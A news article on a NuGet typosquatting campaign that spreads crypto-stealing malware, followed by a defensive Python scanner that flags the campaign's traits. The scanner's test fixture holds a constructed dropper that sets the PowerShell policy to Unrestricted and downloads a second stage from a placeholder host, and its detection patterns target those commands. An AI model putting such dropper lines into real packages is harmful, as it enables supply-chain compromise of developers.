Threat actors are targeting and infecting .NET developers with cryptocurrency stealers delivered through the NuGet repository, using typosquatting to impersonate multiple legitimate packages.
Three of the malicious packages have been downloaded over 150,000 times within a month, according to JFrog security researchers Natan Nehorai and Brian Moussalli, who spotted this ongoing campaign.
While the massive number of downloads could point to a large number of .NET developers who had their systems compromised, it could also be explained by the attackers’ efforts to legitimize their malicious NuGet packages.
“The top three packages were downloaded an incredible amount of times – this could be an indicator that the attack was highly successful, infecting a large amount of machines,” the JFrog security researchers said.
“However, this is not a fully reliable indicator of the attack’s success since the attackers could have automatically inflated the download count (with bots) to make the packages seem more legitimate.”
The threat actors also used typosquatting when creating their NuGet repository profiles, making them look like the accounts of Microsoft software developers working on the NuGet .NET package manager.
The malicious packages are designed to download and execute a PowerShell-based dropper script (init.ps1) that configures the infected machine to allow PowerShell execution without restrictions.
“This behavior is extremely rare outside of malicious packages, especially taking into consideration the ‘Unrestricted’ execution policy, which should immediately trigger a red flag,” the researchers explained.
In the next step, the script downloads and launches a second-stage payload, a Windows executable described by JFrog as a “completely custom executable payload.”
This is an unusual approach compared to other attackers who will mostly use open-source hacking tools and commodity malware instead of creating their own payloads.
The malware deployed on compromised systems can be used for stealing cryptocurrency by exfiltrating the victims’ crypto wallets using Discord webhooks, extracting and executing malicious code from Electron archives, and auto-updating by querying the attacker-controlled command-and-control (C2) server.
“Some packages did not contain any direct malicious payload. Instead, they defined other malicious packages as dependencies, which then contained the malicious script,” the researchers added.
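The two traits described above, an init.ps1 that lifts the PowerShell execution policy before fetching a second stage and wrapper packages that carry only a dependency on the malicious one, can both be checked statically before a package is restored. The following is an added example, not JFrog's tooling or code from the campaign; the package names, URL and rule names are constructed placeholders, and matching the `Bypass` policy value alongside `Unrestricted` is an assumption that goes beyond what the article mentions.

```python
import io, re, zipfile
import xml.etree.ElementTree as ET

# Script behaviour the article describes: lift the execution policy, then download.
RULES = {
    "execution-policy-unrestricted": re.compile(
        r"Set-ExecutionPolicy\b[^\n]*\b(Unrestricted|Bypass)\b", re.I),
    "remote-download": re.compile(
        r"Invoke-WebRequest|DownloadFile|DownloadString|Start-BitsTransfer", re.I),
}

def scan_nupkg(data: bytes) -> dict:
    """Return PowerShell findings and declared dependency ids for one .nupkg."""
    findings, deps = [], []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:  # a .nupkg is a zip archive
        for name in pkg.namelist():
            if name.lower().endswith(".ps1"):
                text = pkg.read(name).decode("utf-8", errors="replace")
                findings += [(name, rule) for rule, rx in RULES.items() if rx.search(text)]
            elif name.lower().endswith(".nuspec"):
                # Compare local tag names so a namespaced nuspec also matches.
                for el in ET.fromstring(pkg.read(name)).iter():
                    if el.tag.rsplit("}", 1)[-1] == "dependency" and el.get("id"):
                        deps.append(el.get("id"))
    return {"findings": sorted(findings), "dependencies": sorted(deps)}

def make_sample(files: dict) -> bytes:
    """Build a constructed .nupkg in memory so the demo runs offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, body in files.items():
            z.writestr(name, body)
    return buf.getvalue()

# Constructed samples: names and URL are placeholders, not indicators.
DROPPER = make_sample({
    "Example.Typo.nuspec": "<package><metadata><id>Example.Typo</id></metadata></package>",
    "tools/init.ps1": "Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser\n"
                      "Invoke-WebRequest https://example.invalid/stage2 -OutFile stage2.exe\n",
})
WRAPPER = make_sample({
    "Example.Wrapper.nuspec": "<package><metadata><dependencies><dependency "
                              "id='Example.Typo' version='1.0.0'/></dependencies></metadata></package>",
})

if __name__ == "__main__":
    for label, blob in (("dropper", DROPPER), ("wrapper", WRAPPER)):
        print(label, scan_nupkg(blob))
```

A wrapper package comes back with no script findings, so the returned dependency ids have to be scanned in turn before the package is treated as clean.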
Payloads delivered in this attack have very low detection rates and will not be flagged as malicious by Defender, the built-in anti-malware component in the Microsoft Windows operating system.
This attack is part of a broader malicious effort, with other attackers going as far as uploading more than 144,000 phishing-related packages to multiple open-source package repositories, including npm, PyPI, and NuGet, as part of a large-scale campaign active throughout 2022.